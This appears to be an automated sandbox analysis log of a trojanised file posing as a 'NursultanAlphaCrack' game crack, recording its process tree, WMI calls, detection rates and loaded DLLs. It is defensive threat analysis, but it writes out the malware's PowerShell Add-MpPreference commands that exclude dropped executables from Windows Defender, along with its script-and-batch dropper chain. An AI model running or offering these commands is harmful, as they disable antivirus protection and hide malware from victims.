Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Command line argument: sfxname	0_2_001DDF1E
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Command line argument: sfxstime	0_2_001DDF1E
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Command line argument: STARTDLG	0_2_001DDF1E
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Command line argument: xz!	0_2_001DDF1E

Source: NursultanAlphaCrack.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NursultanAlphaCrack.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files\Windows NT\smss.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NursultanAlphaCrack.bat.exe	Virustotal: Detection: 72%
Source: NursultanAlphaCrack.bat.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

File read: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe "C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe"
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portsurrogateFontCrt\BlockcontainerWin.exe "C:\portsurrogateFontCrt/BlockcontainerWin.exe"
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\portsurrogateFontCrt\BlockcontainerWin.exe C:\portsurrogateFontCrt\BlockcontainerWin.exe
Source: unknown	Process created: C:\portsurrogateFontCrt\BlockcontainerWin.exe C:\portsurrogateFontCrt\BlockcontainerWin.exe
Source: unknown	Process created: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
Source: C:\Program Files\Windows NT\smss.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portsurrogateFontCrt\BlockcontainerWin.exe "C:\portsurrogateFontCrt/BlockcontainerWin.exe"	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat"	Jump to behavior
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
Source: C:\Program Files\Windows NT\smss.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
